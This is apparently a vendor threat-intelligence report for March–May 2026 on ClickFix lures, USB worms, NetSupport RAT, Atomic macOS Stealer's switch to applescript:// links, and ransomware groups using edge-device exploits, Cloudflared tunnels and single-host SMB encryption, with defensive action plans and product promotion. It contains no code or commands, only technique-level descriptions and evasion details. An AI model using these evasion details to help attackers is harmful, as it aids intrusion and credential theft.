Editor’s Note: This report was authored by Raigridas Bartkus
Key Points
The “ClickFix” technique dominated delivery and can no longer be treated as an emerging threat. It led initial access as Spearphishing Link (14.9%), drove nearly 28% of defense-evasion activity and reached macOS for the first time. Alongside it, the malware leaderboard turned over almost completely for a second straight period, making the behavior more important to defend, not the malware name.
Ransomware consolidated around a shared playbook. Whichever name tops the data-leak site, the leading groups all break using unpatched internet-facing firewalls and VPNs, Cloudflared tunnels, and single-host Server Message Block (SMB) encryption.
Defenders should focus on three things: Spot attacks by behavior rather than by malware name, keep ClickFix detection running on both Windows and macOS, and patch internet-facing firewalls and VPNs fast while watching them for rogue tunnels and unusual file-share traffic.
Between March 1 and May 31, 2026 (“the reporting period”), attackers achieved their objectives by exploiting trusted identities, devices, and tools rather than malicious code. Because their activity resembled normal behavior, traditional perimeter and file-scanning defenses often failed to catch it.
Adversaries leaned on two strategies: social engineering at scale and attacks on unpatched, internet-facing infrastructure. The leading technique “ClickFix” drove the first, shifting delivery from compromised websites to emailed links, while “Qilin,” the period’s most active ransomware operator, continued exploiting unpatched edge devices for mass extortion. What’s more, AI is making social engineering faster, cheaper, and more convincing, accelerating familiar techniques rather than creating new ones.
This marks our third consecutive report showing this pattern. The cast of malware families and ransomware brands changes each period, but methods hold steady. Security leaders must defend against these repeating behaviors, not scramble quarter by quarter to block whichever name currently tops the threat leaderboard.
Read on to learn:
Why ClickFix’s rise to the leading delivery method, including its first use on macOS, demands always-on detection and response.
How a second straight near-total malware leaderboard turnover reinforces the need to detect behavior, not family names.
Why a reshuffled ransomware leaderboard, led by Qilin for a fourth straight quarter, hides a sharp convergence in attacker tradecraft.
One Steady Delivery Lane, Constantly Rotating Malware
Delivery remained steady, anchored by ClickFix, even as malware families changed too quickly to track by name. ClickFix is the delivery technique, while the payloads rotate. Confusing the two leads defenders to chase malware names instead of the underlying behavior.
A Near-Complete Turnover of the Malware Leaderboard
The malware headline this period is churn. For the second consecutive period, the leaderboard changed almost completely (see Figure 1), showing that malware families now rotate too quickly for name-based tracking. Whether this reflects better defenses against certificate abuse and remote-access trojan (RAT)-based delivery or a more fluid ecosystem, the takeaway is that defenders should focus on behavior, especially USB-borne worm spread and abuse of legitimate remote tools.
Last period’s leaders—“BaoLoader” (41%), “Shai-Hulud” (27%), and “RemcosRAT” (18%)—fell out of the top three, replaced by “Gamarue” (aka “Andromeda”), “NetSupport RAT”, and “Raspberry Robin.”
Gamarue is an older modular worm that spreads through removable media using malicious .lnk files and autorun entries. NetSupport RAT is the abused version of the legitimate NetSupport Manager remote-support tool and the payload that ClickFix most often delivers. Raspberry Robin is another removable-media worm often used to broker access for ransomware operators, turning a single infected USB into an early step toward encryption.
Two of the top three families spread through removable media, reinforcing the “seasonal USB” pattern we first flagged in 2025: USB-based infections tend to rise during predictable periods such as US tax season and Q1 financial reporting. With removable media again among the top initial-access techniques, that pattern now looks persistent rather than temporary.
ClickFix Dominates Malware Delivery
ClickFix remained the dominant delivery method this period and, for the first time, we observed it expand to macOS, delivering infostealers onto a platform many organizations still monitor less closely than Windows. This means ClickFix can no longer be handled as a special case. Training, detection, and triage for it should run continuously on both Windows and macOS.
ClickFix is a social-engineering technique, not a malware family. It tricks users into pasting attacker-supplied commands into trusted system dialogs, bypassing file- and email-based defenses. We measure its prevalence through the MITRE ATT&CK techniques it drives, where it leads initial access and much defense-evasion activity. Among this period’s charted families, NetSupport RAT is its clearest payload; Gamarue and Raspberry Robin instead spread through removable media.
ClickFix use has risen steadily from second place in our last report to the top delivery technique now. This period we also saw a ClickFix loader use likely AI-generated obfuscation to deliver “Deepload” malware, burying its real logic under thousands of meaningless variable assignments to defeat static scanning. This helps attackers produce new variants faster and reduces defenders’ time to adapt signatures.
Atomic macOS Stealer Extends ClickFix to macOS
The clearest example of ClickFix reaching macOS this period was “Atomic macOS Stealer” (AMOS). What changed was how it was delivered. Attackers used to disguise AMOS as pirated ("cracked") software or as fake copies of Homebrew, the popular Mac software-installation tool. This period, they switched to an applescript:// link that automatically opens Script Editor, a scripting app built into macOS, and runs the attacker's commands there. The change was likely designed to bypass the warning Apple added in macOS 26.4 that appears when users paste commands into the Terminal command-line app, a warning that isn’t triggered by Script Editor.
AMOS’s capabilities stayed the same, but its reach expanded. It steals browser credentials, session cookies, crypto wallets, and keychain data, feeding directly into valid-account abuse. For enterprises, macOS must no longer be treated as lower risk and now needs the same monitoring and response coverage as Windows.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
ReliaQuest detection content is continuously updated using the latest relevant threat intelligence to focus on catching malware early, at the delivery stage.
GreyMatter Automated Response Playbooks turn detection into action by isolating hosts, revoking sessions, or resetting passwords within minutes to cut off attackers before they can move laterally. Organizations can reduce their mean time to contain (MTTC) to five minutes or less by pairing our detection rules with the following Playbooks:
Block IP/Block URL: Severs the ClickFix download and redirect infrastructure and the NetSupport RAT command-and-control (C2) channel, so the payload can’t fetch its next stage or call home.
Ban Hash + Delete File: Blocks and removes the worm payloads and NetSupport droppers that ClickFix leaves behind.
Reset Password + Terminate Sessions: Revokes the browser sessions, cookies, and tokens that an AMOS-style stealer exfiltrates, since reimaging the host doesn't invalidate credentials already lifted.
Your Action Plan
The following steps target this period's dominant delivery methods, but because many of the malware families here use the same channels, the same training, lockdown, and allowlisting cut exposure to the rest too.
Train users against ClickFix on Windows and macOS. Train users not to paste commands into Run, Terminal, or Script Editor, and simulate ClickFix-style lures on Windows and macOS (like CAPTCHA and verification prompts, “paste this to continue” clipboard steps, and browser-to-shell hand-offs).
Lock down removable media and execution paths. Disable USB autorun, enforce device allowlists, and alert on shortcut (
.lnk) or script execution from external drives. Where disabling Win+R isn’t feasible, restrict it for standard users in high-risk roles, or log and alert on RunMRU activity instead.Maintain an allowlist of remote-access tools and extend monitoring to macOS. Treat any unapproved NetSupport, SimpleHelp, or similar install as a high-priority alert, and on macOS, alert on non-Apple processes reading the login keychain or invoking the security command-line interface (CLI) to dump credentials.
Top Tactics Targeting Enterprise Environments
This section covers the MITRE ATT&CK tactics that shaped attacker behavior this period across initial access, defense evasion, and lateral movement. The common thread is abuse of trusted accounts, tools, and protocols. It’s also where ClickFix appears as a technique rather than a malware family.
Spearphishing Leads Initial Access, Removable Media Close Behind
The main initial-access shift this period was Drive-By Compromise dropping out of the top three, likely because many ClickFix campaigns moved from websites (recorded under “Drive-By”) to email (recorded under “Spearphishing”). This favors defenders, because unlike drive-by attacks, emailed lures must pass through the mail pipeline, where gateways, link rewriting, and sandboxing can stop them before the click.
Removable Media remained the other major access path, tied to Gamarue and Raspberry Robin and reinforcing the need to lock down external devices to control both initial access and malware spread.
Domain Accounts reflected straightforward valid-account abuse, where attackers sign in with credentials the directory is built to trust. Across all three, attackers relied on channels and access the organization already trusts.
Defense Evasion Split: Masquerading vs. the ClickFix Execution Chain
The masquerading technique Match Legitimate Name or Location represents the on-host side of the same trust abuse seen across this report.
Attackers disguise tools, files, and processes as legitimate software to blend in. Because of this, checking a file's unique fingerprint (i.e., its hash) against known-bad lists no longer works well, so the better tell is a legitimate-looking file showing up in the wrong place or under the wrong name.
Behind it is the ClickFix execution chain. Command Obfuscation and Obfuscated Files or Information are two parts of the same activity: A pasted command runs through an obfuscated command line, then pulls a heavily obfuscated payload. Together they make up nearly 28% of defense-evasion activity—almost unchanged from last quarter—and represent the clearest on-host fingerprint of ClickFix.
When attackers use trusted interpreters and legitimate-looking tools, file-reputation and signature controls struggle, so defenders need to focus on behavior, what the process does and where it runs.
SMB Overtakes RDP as the Top Lateral-Movement Technique
Lateral movement saw the period’s sharpest shift, likely driven by ransomware affiliate churn. Server Message Block (SMB)/Windows Admin Shares roughly tripled from last period, now overtaking RDP, while Windows Remote Management (WinRM) also rose, entering the top three for the first time. SMB had long sat around 12% as a complement to RDP, so 36% is a record high and a sharp break from that baseline, not a return to any earlier level.
Last quarter we flagged ransomware group “Akira” leaning on single-host SMB encryption and forecast the technique would remain a standard ransomware tactic; this quarter it did more than persist—it surged. We assess with moderate confidence that the uptick reflects ransomware affiliates carrying Akira-style tradecraft into other ransomware brands, including Qilin, “DragonForce,” and “The Gentlemen.”
In many SMB cases, encryption ran from a single trusted host, leaving victim machines with little suspicious local activity. That makes detection a network and identity problem: Watch for bulk SMB writes to ADMIN$, C$, or IPC$ shares from non-management hosts. Because legitimate deployment and backup tools also use these shares, baseline known management hosts and service accounts first. The strongest signal is bulk-writes from user workstations or newly seen hosts, outside change windows, to many destinations at once.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Protect your organization against the top initial-access, defense-evasion, and lateral-movement techniques detailed in this report by enabling ReliaQuest detection rules, complemented by the following GreyMatter Automated Response Playbooks:
Disable User/Reset Password: Cuts off the compromised identity by disabling the account and forcing a credential reset, so the stolen logins behind the Domain Accounts abuse above can’t be reused.
Ban Hash + Delete File: Blocks the malicious file from running and removes every copy across the estate, so the renamed, signed-looking binary behind the masquerading can’t resurface or reload after cleanup.
Isolate Host: Severs the host driving the single-host SMB encryption from the network, halting the bulk writes to admin shares at their source.
Your Action Plan
Because the most damaging activity now hides inside legitimate identities, tools, and hosts, each of these priorities comes back to knowing your environment's normal well enough to catch the deviation.
Lock down valid-account abuse. Enforce phishing-resistant MFA on external and privileged access, and alert on sign-ins that break a user’s normal pattern of location, device, or timing.
Baseline legitimate tools and names. Alert on trusted binaries running from non-standard paths and on remote-management tools outside your sanctioned set, the core tells of masquerading.
Treat SMB lateral movement as a tier-one signal. Watch for bulk SMB writes to administrative shares from non-management hosts, after baselining your real management traffic.
Top Ransomware and Extortion Techniques
The leaderboard shifted sharply this quarter, but the more important finding is that the tradecraft behind it converged. The top-tier increasingly follows the same playbook: initial access through unpatched internet-facing edge devices, Cloudflared (a legitimate software agent that securely connects a local private network to Cloudflare’s global network) tunnels for C2, and single-host SMB encryption. In practice, defending well against one leading operator now means defending against most of them.
The shared post-access chain was also consistent: edge access, internal reconnaissance, RDP to a domain controller, privilege escalation through credential dumping or abuse of Active Directory Certificate Services (ADCS), and then encryption or large-scale exfiltration. This pattern now matters more than which brand tops the leak site, because the same hands-on activity is appearing across multiple leading groups.
Defenders must focus on the shared chokepoints rather than per-group detections. Prioritize patching and hardening internet-facing edge devices, especially FortiGate appliances; monitor for rogue local accounts and lingering authentication misconfigurations; detect Cloudflared tunnels in environments where they aren’t expected; watch for RDP access to domain controllers; and alert on credential dumping, ADCS abuse, and bulk SMB writes to administrative shares from non-management hosts.
Akira remains a useful example of this playbook, particularly its use of edge-device exploitation, rogue temporary accounts, Cloudflared tunnels, SMB encryption, and ESXi targeting. But the key point this quarter is that these techniques are now being used by multiple groups.
Sector Targeting Sees Across-the-Board Decline
Falling victim counts don’t mean the threat is easing. The ecosystem is consolidating around fewer, more disciplined, higher-impact operators, so incidents may be less frequent but more damaging. For the fourth consecutive period, named-victim counts declined across most sectors, with professional, scientific, and technical services (PSTS) still the most targeted while manufacturing declined sharply.
PSTS firms often sit inside client environments or ship software used by many downstream organizations, making one compromise spread far beyond the named victim. Whether through supply-chain attacks, as seen with the Shai-Hulud npm worm, or inherited exposure in mergers and acquisitions (M&A), the real impact extends to clients, dependents, and acquirers.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Catch ransomware activity early with our detection rules and use the following GreyMatter Automated Response Playbooks to respond rapidly when the detection rules fire:
Isolate Host: Contains the single trusted host issuing bulk SMB writes before encryption fans out across the network; this is the confirmed active-compromise case where last-resort isolation is warranted.
Block IP/Block URL: Severs the Cloudflared tunnel the converged top-tier playbook relies on for C2 and persistence.
Ban Hash + Delete File: Blocks and removes any file matching the Emergency Hash IOC across the estate.
Your Action Plan
This quarter's ransomware activity converged on the perimeter, so every priority below is about closing the internet-facing inbound paths before they become entry points.
Patch internet-facing devices on emergency timelines and harden them. Pair every patch with configuration hardening: Remove legacy and local VPN accounts and enforce MFA across all authentication formats.
Audit edge devices and ADCS. Hunt your FortiGate and other edge appliances for known Akira and Qilin indicators, such as “temp”-account creation, Cloudflared tunnels, and the hashes in our prior reporting, and review ADCS certificate-template permissions to close the common escalation path.
Treat PSTS firms as pivot points. If you serve other organizations, assume you’re a route into their environments and tightly monitor the privileged inbound paths, such as remote-administration and remote monitoring and management (RMM) tools, shared or federated identity-provider roles, managed VPN and site-to-site links, and shared support accounts.
Key Takeaways and What’s Next
This period sharpened a pattern building across our last three reports. Attackers are reaching their goals by abusing trust, not breaking it. ClickFix tricks users into launching attacks themselves, worms spread through trusted USB media, legitimate tools and admin channels hide malicious activity, and unpatched edge devices keep enabling mass extortion. These attacks rely less on novel malware than on what environments already allow.
AI is accelerating this pattern, not changing it. It makes familiar tactics faster, cheaper, and more convincing, which is why techniques like ClickFix can scale without fundamentally changing.
The takeaway is that signatures, reputation, and perimeter defenses are no longer enough on their own. Detection has to focus more on behavior—what a process does, where a tool runs, and how an account is used—because attacker names and malware families now change too quickly to track effectively.
Three Forecasts for the Next Reporting Period
The malware leaderboard will keep churning, and behavior will stay the only durable signal. Over the next one to two quarters, near-total turnover at the top of the malware family table will highly likely continue, as it has for the last two consecutive periods. This means signature- and name-based detection will keep decaying between reports. AI is accelerating that churn, with attackers increasingly using it to write and rework malicious code. And the shift toward agentic tools that generate and adapt variants with little human input means new families will surface faster than any name-based list can track them. For defenders, the reassuring part is that the response doesn't have to change as fast as the malware does. Detecting how an attack behaves rather than what it's called keeps working however many new variants appear. Meeting attacker AI with AI of your own keeps detection and response in step as they multiply, and this approach is important to put in place today.
Single-host SMB encryption will become the default deployment method. Over the next two to three quarters, it will likely become the most common method among the leading operators. This is because encrypting many hosts from one already-trusted host works in almost any environment and pairs naturally with the Cloudflared persistence these groups already rely on, so it’s both efficient and easy to fold into their existing playbook. We hold this at moderate confidence, based on this reporting period’s jump from 12% to 36%.
Ransomware will keep consolidating around fewer, higher-impact operators. Over the next two to three quarters, named-victim counts will likely keep falling while the impact per incident rises. This is grounded in the fact that Qilin has now led for four straight quarters while the overall count has also fallen for four, and the top-tier is already converging on a shared FortiGate-Cloudflared-SMB playbook. That convergence makes the shared edge-device chokepoint the priority to defend, and it means brand-keyed blocklists will keep under-rating rebrands and splinters like The Gentlemen.
